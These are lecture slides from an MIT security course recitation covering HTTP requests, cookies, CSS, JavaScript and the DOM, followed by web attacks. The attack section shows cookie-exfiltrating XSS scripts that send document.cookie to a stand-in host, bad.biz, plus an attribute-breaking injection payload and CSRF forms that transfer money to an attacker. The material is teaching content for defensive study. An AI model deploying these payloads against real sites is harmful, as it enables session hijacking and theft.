6.858 Recitation: The Web and The Browser

Jon Gjengset & Alex Grinman

The Web and The Browser

MIT 6.858 Recitation

Jon Gjengset

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

Browsers and sessions

When you navigate to a web page, your browser sends an HTTP request to the host named in the URL. The request contains information about the document being requested, plus information about the requesting browser.

Requesting a web page

			GET /zoobar/index.cgi/login?nexturl=... HTTP/1.1
			Host: zoobar:8080
			Connection: keep-alive
			Cache-Control: max-age=0
			Accept: text/html,application/xhtml+xml,...
			User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \
						(KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
			Referer: http://zoobar:8080/
		

Serving a web page

			HTTP/1.0 200 OK
			Content-Type: text/html; charset=utf-8
			Content-Length: 1223
			 
			<!DOCTYPE html>
			<html>
				<head>
					<meta charset="utf-8">
					<title>Login - Zoobar Foundatio</title>
			...
		

Web forms

			<form method="GET|POST" action="URL">
				<input name="field_name" type="text|hidden" />
				<input name="field_name" type="submit" value="Button text" />
			</form>
		

POST goes in request body, GET goes in URL.

Query parameters

Form fields and other parameters are given in the URL after ?.
http://google.com/search?q=6858+lab3

Multiple key=value pairs are separated by &.
Every value is URL encoded to avoid parsing ambiguities:
?q=difference between = & ==? becomes
?q=difference%20between%20%3D%20%26%20%3D%3D%3F.

%XX just means the letter 0xXX in ASCII; %20 = 0x20 = 32 = " " in ASCII.

Submitting data to the server

			POST /zoobar/index.cgi/login HTTP/1.1
			...
			Content-Length: 94
			Content-Type: application/x-www-form-urlencoded
			 
			login_username=admin&login_password=admin \
			submit_login=Log+in&nexturl=%2Fzoobar%2Findex.cgi%2F
		

Browsers and sessions

HTTP was created to be stateless.

Cookies enable servers to track browsers across requests.

Cookies give us the key to the castle. Steal cookies and you steal another user's (authenticated) session.

Keeping track of users

			HTTP/1.0 302 FOUND
			Location: http://localhost:8081/zoobar/index.cgi/
			Set-Cookie: PyZoobarLogin=\
						admin#490fe09a56829992795ce8a4739fb279; Path=/
		

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

CSS: HTML's much prettier sibling

CSS lets you change the appearance of your HTML elements. Of particular importance to us is the ability to hide elements.

CSS is expressed as a set of rules, each consisting of one or more selectors, and a declaration. A declaration assigns values to a number of properties to change various aspects of an element's apperance.

Selectors: what elements to change

			<div>...</div>
			<p>...</p>
			<div>...</div>
		
div { ... }

Selectors: what elements to change

			<div>...</div>
			<div id="a">...</div>
			<div>...</div>
		
#a { ... }

There can only be a single element on the page with a given ID.

Selectors: what elements to change

			<div class="a">...</div>
			<div class="a">...</div>
			<div>...</div>
		
.a { ... }

Selectors: what elements to change

Selectors can be nested to select child elements.

			<div>
				<div class="a">...</div>
				<div>...</div>
			</div>
			<div class="a">...</div>
		
div .a { ... }

Selectors: what elements to change

They can also be ORed using ,.

			<div class="a">...</div>
			<div class="b">...</div>
			<div class="c">...</div>
		
.a, .c { ... }

Declarations: what to change

			<div>
			
Turtles all the way down.
</div>
			div {
				color: red;
			}
		

You can also use <div style="…">

Declarations: what to change

			<div>
			
Turtles all the way down.
</div>
			div {
				font-weight: bold;
			}
		

You can also use <div style="…">

Declarations: what to change

			<div>
			
Turtles all the way down.
</div>
			div {
				background-color: red;
				color: #CCC;
			}
		

You can also use <div style="…">

Declarations: what to change

Why are they useful? Well, we can hide things...

Hiding things with CSS

			<div>
			
Turtles all the way down.
</div>
			div {
				visibility: hidden;
			}
		

Hiding things: TIMTOWTDI

			<div>
			
Turtles all the way down.
</div>
			div {
				display: none;
			}
		

Hiding things: TIMTOWTDI

			<div>
			
Turtles all the way down.
</div>
			div {
				width: 0;
				height: 0;
				overflow: hidden;
			}
		

Hiding things: TIMTOWTDI

			<div>
			
Turtles all the way down.
</div>
			div {
				line-height: 0;
				font-size: 0;
				color: white;
			}
		

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

Dynamic web pages: JavaScript

JavaScript (unrelated to Java) is a scripting language that was built to allow developers to build pages that change client-side.

Can read and modify HTML documents, query browser state, prompt the user for input, and make HTTP requests as the user.

Dynamic web pages: JavaScript

			<script type="text/javascript">
				// Your JavaScript code goes here
				// It effectively executes as the user
			</script>
		

Debugging JavaScript

			// alert() is your friend for debugging
			alert("Hello world");
			// console.log() is even better
			console.log({ iam: "a JS object" });
		

Accessing HTML: The DOM

HTML documents are represented as trees in JavaScript. Called the Document Object Model (DOM) and accessed through document.

			var body = document.body;
		

Accessing HTML: The DOM

HTML documents are represented as trees in JavaScript. Called the Document Object Model (DOM) and accessed through document.

			var body = document.body;
			var body = document.getElementsByTagName("body")[0];
			var div  = document.getElementById("some_id");
			var divs = document.getElementsByClassName("some_class");
		

Accessing HTML: The DOM

In modern browsers, we can also query using CSS selectors!

			var div  = document.querySelector("div#some_id");
			var divs = document.querySelectorAll("div.some_class");
		

Accessing HTML: The DOM

We can also query child elements by doing DOM lookups on them

			var div  = document.querySelector("div#some_id");
			var divs = document.querySelectorAll("div.some_class");
			var ps  = div.querySelectorAll("p");
		

A caveat

We can only find elements after they've been created

			<script>
				div = document.getElementById("ex"); // div will be null!
			</script>
			<div id="ex"></div>
			<script>
				div = document.getElementById("ex"); // yields HTMLDivElement
			</script>
		

DOM Events

JavaScript can react to events on the page.

			div.addEventListener("click", function(e) {
				alert("you clicked me");
			}, false)
		

or can trigger events, like submitting a form:

			link.click()
			
		

DOM Events to the rescue

Helps us wait for elements to become accessible:

			window.addEventListener("load", function(e) {
				// All page elements available here
			}, false)
		

JavaScript and forms

For the lab, you will be dealing with forms:

			form.addEventListener("submit", function(e) {
				e.preventDefault();
				alert("you tried to submit the form");
			}, false)
		
			form.submit()
			
		

JavaScript and forms

We can also read values from form fields

			form.addEventListener("submit", function(e) {
				e.preventDefault();
				var input = form.getElementsByTagName('input')[0];
				alert("you tried to submit the value " + input.value);
			}, false)
		

Manipulating the page

We can manipulate the HTML using DOM too

			div.textContent = "superman was here";
		

Manipulating the page

We can manipulate the HTML using DOM too

			div.textContent = "superman was here";
			div.innerHTML = "<strong>batman</strong> was here";
		

Manipulating the page

We can manipulate the HTML using DOM too

			div.textContent = "superman was here";
			div.innerHTML = "<strong>batman</strong> was here";
			var p = document.createElement("p");
			p.textContent = "6.858 TAs were here too";
			div.appendChild(p);
		

Communicating with the outside world

We can use the HTML to communicate with the outside world!

			var img = document.createElement("img");
			img.setAttribute("src", "http://bad.biz/ping.png");
			// or just img.src = "http://bad.biz/ping.png";
			div.appendChild(img);
		

There's even a shorthand:

			(new Image()).src = "http://bad.biz/ping.png";
		

Communicating with the outside world

Loading can succeed or fail

			img.addEventListener("load", function() {
				// Image loaded successfully
			}, false)
			img.addEventListener("error", function() {
				// Image failed to load
			}, false)
		

You should add event listeners before appendChild!
Also useful on <iframe>

Timing is everything

Sometimes, patience is needed: setTimeout to the rescue.

			setTimeout(function() {
				// This will execute in ~2 seconds.
			}, 2 * 1000);
		

There is also setInterval for repeated execution.

The path to enlightenment

  1. Browsers, sessions, and forms
  2. Styling the page
  3. JavaScript and the DOM
  4. Security on the web

What could possibly go wrong?

JavaScript acts with the user's privileges => Confused deputy.

Remember those cookies?

			<script>
				alert(document.cookie);
			</script>
		

What could possibly go wrong?

Remember how we can communicate with the outside world?

			<script>
				var target = "http://bad.biz/here-you-go.php?jar=";
				target += document.cookie;
				(new Image()).src = target;
			</script>
		

What could possibly go wrong?

Remember URL encoding?

			<script>
				var target = "http://bad.biz/here-you-go.php?jar=";
				target += encodeURIComponent(document.cookie);
				(new Image()).src = target;
			</script>
		

But wait, we have Same-Origin!

Uh oh. But aren't there defenses against this?!

Yes! Same-Origin Policy:

JavaScript running in one origin (= host + port + protocol) cannot read or modify pages in other origins.

So the attacker can't insert JavaScript in our page in the first place!

Phew, we're safe. Right?

So JavaScript on bad.biz can't read my bank page, or submit form to transfer all my $$$. That's great.

Are we safe?

Hahaha, no.

Web service vulnerabilities

What if attacker can get malicious JavaScript to run in the right origin?

			<!-- hello.php -->
			<p>Hello <em><?php echo $_GET['name']; ?></em>.</p>
		

Web service vulnerabilities

GET hello.php?name=jon

			<p>Hello <em>jon</em>.</p>
			
		

Looks good — ship it!

Never trust user input.

GET hello.php?name=jon%3Cscript%3E%0A(new%20Image()).src%20%3D%20%22http%3A%2F%2Fbad.biz %2F%3Fx%3D%20%2B%20encodeURIComponent(document.cookie)%3B%0A%3C%2Fscript%3E

			<p>Hello <em>jon<script>
			(new Image()).src = "http://bad.biz/?x= +
								encodeURIComponent(document.cookie);
			</script></em>.</p>
		

Oops.

Never trust user input.

Sometimes you will have to close tags/attributes in your values!

			<!-- users.php -->
			<input type="text"
				   name="user"
				   value="<?php if ($_GET['user']) {echo $_GET['user'];} ?>"
			/>
		

Code like this is often used to restore forms on errors.
These attacks are not specific to PHP.

Never trust user input.

GET form.php?user=%22%20%2F%3E%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E %3Cinput%20type%3D%22hidden%22%20value%3D%22

			<input type="text"
				   name="user"
				   value="" />
			<script>alert("xss")</script>
			<input type="hidden" value="" />
		

Never trust user input.

Reflected Cross-Site Scripting is only effective if you can get someone to visit a malicious URL (which is not that hard).

Many many other types of XSS exist. Could, for example, store JavaScript in your username. Won't be echoed back immediately, but will be printed elsewhere. Allows attacking other users.

Cross-Site Request Forgery

Even if your site is not vulnerable to XSS, there are other ways to lose:

			<!-- evil.html -->
			<form method="POST" action="https://good.com/transfer">
				<input type="hidden" name="to" value="badguy" />
				<input type="hidden" name="amount" value="10000" />
				<input type="submit" value="Free iPad" />
			</form>
		

Looks like a legitimate transfer request to good.com!

Cross-Site Request Forgery

Don't want the user to see the target site? Use iframe and target.

			<!-- evil.html -->
			<form method="POST" action="https://good.com/transfer" target="f">
				<input type="hidden" name="to" value="badguy" />
				<input type="hidden" name="amount" value="10000" />
				<input type="submit" value="Free iPad" />
			</form>
			<iframe name="f" src="…"></iframe>
		

Only the (potentially hidden) iframe changes.

Cross-Site Request Forgery

In fact, there's an even easier way:
https://bank.com/xfer?amount=500&to=attacker.

"But banks use forms for transfers!"
https://x.wordpress.com/wp-admin/post.php?post=349&action=trash.

Getting users to click your link

I would never click such a link!
Anonymous 6.858 student on Piazza

Of course not! How about this one?

			https://www.google.com/maps/42.3625235,-71.0900909,3a,75y,200.43h,99.9t/data=!3m7!1e1!3m5!1s1pyYsZDrw11f-gKD36D2Ww!2e0!6s//geo0.ggpht.com/cbk?panoid=1pyYsZDrw11f-gKD36D2Ww&output=thumbnail&cb_client=maps_sv.tactile.gps&thumb=2&w=203&h=100&yaw=211.96698&pitch=0!7i13312!8i6656@bank.com/xfer?amount=500&to=attacker
		

Other vulnerabilities

Defenses